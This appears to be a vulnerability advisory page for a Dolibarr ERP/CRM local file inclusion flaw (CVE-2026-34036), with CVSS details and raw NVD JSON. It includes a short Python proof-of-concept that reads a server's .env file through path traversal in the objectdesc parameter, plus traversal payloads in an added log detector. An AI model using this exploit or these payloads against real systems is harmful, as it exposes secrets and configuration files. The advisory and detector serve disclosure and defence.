Security Vulnerability Report
CVE-2026-34036 CVSS 6.5 MEDIUM

CVE-2026-34036

Published: 2026-03-31 03:15:58
Last Modified: 2026-04-03 16:54:36

Description

Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches.
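As an added defender-side example that is not part of this report: a small detector that scans web-server access logs for requests to /core/ajax/selectobject.php whose objectdesc parameter carries path traversal once percent-encoding (including a double-encoded layer) is undone. The log lines are constructed, and the assumption that legitimate objectdesc values are colon-separated descriptors whose path part never contains traversal or an absolute path is mine, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format); not taken from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2026:10:01:02 +0000] "GET /core/ajax/selectobject.php?objectdesc=Societe%3Asociete%2Fclass%2Fsociete.class.php&objectfield=fk_soc HTTP/1.1" 200 512
10.0.0.9 - - [31/Mar/2026:10:01:09 +0000] "GET /core/ajax/selectobject.php?objectdesc=..%2F..%2F.env HTTP/1.1" 200 1203
10.0.0.9 - - [31/Mar/2026:10:01:15 +0000] "GET /core/ajax/selectobject.php?objectdesc=%252e%252e%2F%252e%252e%2Fconf%2Fconf.php.bak HTTP/1.1" 200 88
10.0.0.7 - - [31/Mar/2026:10:02:00 +0000] "GET /index.php?mainmenu=home HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path segment, with either slash style, at the start, middle or end of a part.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious_objectdesc(desc):
    """True if any colon-separated part of objectdesc traverses, is absolute, or carries a NUL."""
    decoded = fully_decode(desc)
    if "\x00" in decoded:
        return True
    for part in decoded.split(":"):
        part = part.strip()
        if part.startswith("/") or TRAVERSAL_RE.search(part):
            return True
    return False

def scan_log(text):
    """Return (ip, status, decoded objectdesc) for each selectobject.php request that looks abusive."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/core/ajax/selectobject.php"):
            continue
        for desc in parse_qs(parts.query).get("objectdesc", []):  # parse_qs removes one encoding layer
            if is_suspicious_objectdesc(desc):
                hits.append((m.group("ip"), int(m.group("status")), fully_decode(desc)))
    return hits
```

A 200 status on a flagged request is the case worth escalating, since the fail-open check means the read is likely to have succeeded.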

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* - VULNERABLE
Dolibarr ERP/CRM <= 22.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-34036 PoC for Dolibarr LFI
# Target: Dolibarr <= 22.0.4
# Endpoint: /core/ajax/selectobject.php
# Note: Requires authentication (low privilege)

target_url = "http://target-url/core/ajax/selectobject.php"

# Authenticate and get session cookie (simplified)
session = requests.Session()
login_payload = {
    "username": "low_priv_user",
    "password": "password"
}
session.post("http://target-url/index.php", data=login_payload)

# Exploit payload: Path traversal to read .env file
params = {
    "objectdesc": "../../.env"
}
response = session.get(target_url, params=params)

if response.status_code == 200:
    print("[+] Exploit successful! File content:")
    print(response.text)
else:
    print("[-] Exploit failed or file not found")
```

References

https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a (Patch)
https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r (Exploit, Mitigation, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34036",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T03:15:57.710",
    "lastModified": "2026-04-03T16:54:36.280",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. In versions 22.0.4 and prior, there is a Local File Inclusion (LFI) vulnerability in the core AJAX endpoint /core/ajax/selectobject.php. By manipulating the objectdesc parameter and exploiting a fail-open logic flaw in the core access control function restrictedArea(), an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as .env, .htaccess, configuration backups, or logs…). At time of publication, there are no publicly available patches."
      },
      {
        "lang": "es",
        "value": "Dolibarr es un paquete de software de planificación de recursos empresariales (ERP) y gestión de relaciones con clientes (CRM). En las versiones 22.0.4 y anteriores, existe una vulnerabilidad de inclusión local de ficheros (LFI) en el endpoint AJAX principal /core/ajax/selectobject.php. Al manipular el parámetro objectdesc y explotar un fallo lógico de 'fail-open' en la función de control de acceso principal restrictedArea(), un usuario autenticado sin privilegios específicos puede leer el contenido de ficheros no PHP arbitrarios en el servidor (como .env, .htaccess, copias de seguridad de configuración o registros...). En el momento de la publicación, no hay parches disponibles públicamente."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-98"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "22.0.4",
                "matchCriteriaId": "3BAE3269-374D-425C-B943-C4DA4494F7BF"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```